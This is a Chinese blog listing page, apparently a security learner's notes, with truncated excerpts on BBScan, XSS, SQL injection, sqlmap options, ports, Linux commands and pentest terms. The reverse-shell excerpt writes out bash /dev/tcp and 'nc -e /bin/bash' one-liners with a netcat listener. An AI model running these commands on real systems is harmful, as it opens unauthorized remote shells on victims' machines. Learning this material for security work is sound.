- 博客(12)
- 收藏
- 关注
RSS订阅原创 bbscan
扫描单个web服务 www.target.com python BBScan.py --host www.target.com --browser 2. 扫描www.target.com和www.target.com/28下的其他主机 python BBScan.py --host www.target.com --network 28 --browser 3. 扫描txt文件中的所有主机...
2019-10-28 16:50:22
353
原创 反弹shell
多种姿势反弹shell bash attacker 监听 nc -lvvp 4444 victim 运行 bash -i >& /dev/tcp//4444 0>&1 nc 支持 -e 选项 attacker 监听 nc -lvvp 4444 victim 运行 nc 4444 -t -e /bin/bash python attacker 监听 nc -...
2019-09-09 23:37:04
323
1
原创 xss漏洞
XSS攻击是Web攻击中最常见的攻击方法之一,它是通过对网页注入可执行代码且成功地被浏览器 执行,达到攻击的目的,形成了一次有效XSS攻击,一旦攻击成功,它可以获取用户的联系人列表,然后向联系人发送虚假诈骗信息,可以删除用户的日志等等,有时候还和其他攻击方式同时实 施比如SQL注入攻击服务器和数据库、Click劫持、相对链接劫持等实施钓鱼,它带来的危害是巨 大的,是web安全的头号大敌 实施XSS...
2019-09-04 22:33:27
413
原创 sql注入
sql原理 传入的参数拼接在数据库的查询语句中 导致一并进入到数据 sql注入有5种类型 Boolean-based blind SQL injection(布尔型注入) Error-based SQL injection(报错型注入) UNION query SQL injection(可联合查询注入) Stacked queries SQL injection(可多语句查询注入) Time-b...
2019-08-25 22:33:23
240
原创 Linux常用命令
linux主要特征 :一切且文件 pwd 显示当前目录名称 mkdir 常见目录 rmdir 删除目录 touch 创建文件 mv 移动或者重命名一个文件或者目录 cp 复制目录 ln link的缩写,用于建立硬(软)链接,常用于软件安装时建软链接 useradd 创建用户 tar -zxvf 压缩 tar -jxvf 解压 zip 压缩 unzip 解压 ...
2019-08-06 23:12:51
139
原创 Http请求方法与状态码
请求方法: HEAD HEAD方法请求一个与GET请求的响应相同的响应,但没有响应体. POST POST方法用于将实体提交到指定的资源,通常导致在服务器上的状态变化或副作用. PUT PUT方法用请求有效载荷替换目标资源的所有当前表示。 DELETE DELETE方法删除指定的资源。 CONNECT CONNECT方法建立一个到由目标资源标识的服务器的隧道。 OPTIONS OPTIONS方法用...
2019-07-29 21:01:24
217
原创 域名DNS 解析
域名解析是把域名指向网站空间IP,让人们通过注册的域名可以方便地访问到网站的一种服务 IP地址是网络上标识站点的数字地址,为了方便记忆,采用域名来代替IP地址标识站点地址 域名解析就是域名到IP地址的转换过程 域名的解析工作由DNS服务器完成 互联网中的地址是数字的IP地址,域名解析的作用主要就是为了便于记忆 解析过程,比如,一个域名为:abc.com,是想...
2019-07-26 21:37:46
407
原创 渗透测试常用名词
poc 验证漏洞是否存在代码 exp 漏洞利用攻击 webshell web下的shell web后门 shell 与系统交互的通道 反向 由受害者到攻击者 正向 由攻击者到受害者 菜刀 一句话 提权 就是提高自己在服务器中的权限 payload getshell 获取webshell的过程 oday(在野oday) 未被纰漏的漏洞 1day ...
2019-07-25 20:05:29
879
原创 常用端口
http协议代理服务器常用端口 :80/8080/3128/3081/9080 socks代理协议服务器常用端口 :1080 FTP(文件传输)协议常用端口 :21 Telnet(远程登陆)协议常用端口 :23 SSH(安全登录) SCP(文件传输) 端口重定向 默认端口 :22/tcp weblogic 默认端口 :7001 webSphere应用程序 默认端口为9080 webSphere管...
2019-07-24 20:43:49
393
原创 sqlmap常用命令及使用方法
-d DIRECT 直接连接数据库的连接字符串 -u 目标url -I 日志文件 从burp或者webScarab代理日志文件中分析目标 -x 网站地图URL 从远程网站地图(sitemap.xml)文件来解析目标 -m 文件 将目标地址保存在文件中,一行一个url地址进行批量检测 -r 请求文件 -c 配置文件 从配置ini文件中加载选项 -o 打开所有的优化开关 -p...
2019-07-23 23:31:38
952
原创 php获取文件并用MD5加密 并输出到另一个文件中
<?php $welcomefile=file('top10.txt'); //获取文件 foreach($welcomefile as $v){ //foreach方法遍历数组 echo md5($v).''; //MD5加密 file_put_contents('filename.txt', md5($v).PHP_EOL,FILE_APPEND); //...
2019-07-16 21:23:08
890
空空如也
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人